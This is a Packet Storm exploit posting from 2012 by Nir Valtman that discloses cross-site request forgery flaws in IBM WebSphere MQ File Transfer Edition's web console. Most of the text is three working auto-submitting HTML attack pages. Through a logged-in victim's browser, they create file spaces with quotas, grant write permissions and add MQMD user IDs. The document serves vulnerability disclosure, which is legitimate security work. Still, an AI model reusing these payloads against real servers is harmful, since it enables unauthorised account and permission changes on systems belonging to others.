Lucene search

K
packetstormNir ValtmanPACKETSTORM:115475
HistoryAug 13, 2012 - 12:00 a.m.

IBM WebSphere MQ File Transfer Edition Web Gateway CSRF

2012-08-1300:00:00
Nir Valtman
packetstormsecurity.com
34

0.005 Low

EPSS

Percentile

75.3%

`*Exploit Author:* Nir Valtman  
  
*Description:* Malicious user is able to add userspace, change permissions  
on existing userspace and add MQMD (MQ Message Descriptor) user IDs. All of  
the these vulnerabilities can be exploited using a CSRF (Cross Site Request  
Forgery) attack.  
Few days ago the CVE has  
been published here<http://www-01.ibm.com/support/docview.wss?uid=swg21607482>  
  
*  
*  
*Affected Platforms: *Version 7.0.4 and all previous versions of WebSphere MQ  
File Transfer Edition<http://publib.boulder.ibm.com/infocenter/wmqfte/v7r0/index.jsp>running  
on all platforms are affected.  
* *  
*  
*  
*Exploit Details:*  
*1. CSRF To add user and define his quota on a userspace*  
I created the following HTML page and then opened it by a logged-on user:  
  
<html>  
  
<head></head>  
  
<body>  
  
<form id="frm" method="post"  
action="https://*[ip-address-and-port]* /wmqfteconsole/Filespaces"  
  
<input type="hidden"  
name="nirvcsrf" value="junk" />  
  
<input type="hidden"  
name="name" value="zzzzzz" />  
  
<input type="hidden"  
name="quota" value="15" />  
  
<input type="hidden"  
name="id" value="NewFileSpace" />  
  
  
  
</form>  
  
<script>  
  
document.frm.submit();  
  
</script>  
  
</body>  
</html>  
See the following screenshot, which follows the execution of CSRF attack:  
[image: Inline image 1]  
  
*2. CSRF to add permissions on file spaces:*  
I created the following HTML page and then opened it by a logged-on user:  
  
<html>  
  
<head></head>  
  
<body>  
  
<form id="frm" method="post"  
action="https://*[ip-address-and-port]*  
/wmqfteconsole/FileSpacePermisssions"  
  
<input type="hidden"  
name="nirvcsrf" value="junk" />  
  
<input type="hidden"  
name="user" value="bodek2" />  
  
<input type="hidden"  
name="write" value="authorized" />  
  
<input type="hidden"  
name="id" value="zzzzzz_TEMP_PERMISSIONS" />  
  
  
  
</form>  
  
<script>  
  
document.frm.submit();  
  
</script>  
  
</body>  
</html>  
  
See the following screenshot, which follows the execution of CSRF attack:  
[image: Inline image 2]  
  
*2. CSRF to add MQMD user id:*  
I created the following HTML page and then opened it by a logged-on user:  
  
<html>  
  
<head></head>  
  
<body>  
  
<form id="frm" method="post"  
action="https://*[ip-address-and-port]*/wmqfteconsole/UploadUsers"  
  
<input type="hidden"  
name="nirvcsrf" value="junk" />  
  
<input type="hidden"  
name="userID" value="csrfUserId" />  
  
<input type="hidden"  
name="mqmdUserID" value="userIdTest" />  
  
<input type="hidden"  
name="id" value="NewUploadUser" />  
  
  
  
</form>  
  
<script>  
  
document.frm.submit();  
  
</script>  
  
</body>  
  
</html>  
  
See the following screenshot, which follows the execution of CSRF attack:  
[image: Inline image 3]  
  
Best Regards,  
Nir Valtman  
  
`

0.005 Low

EPSS

Percentile

75.3%

Related for PACKETSTORM:115475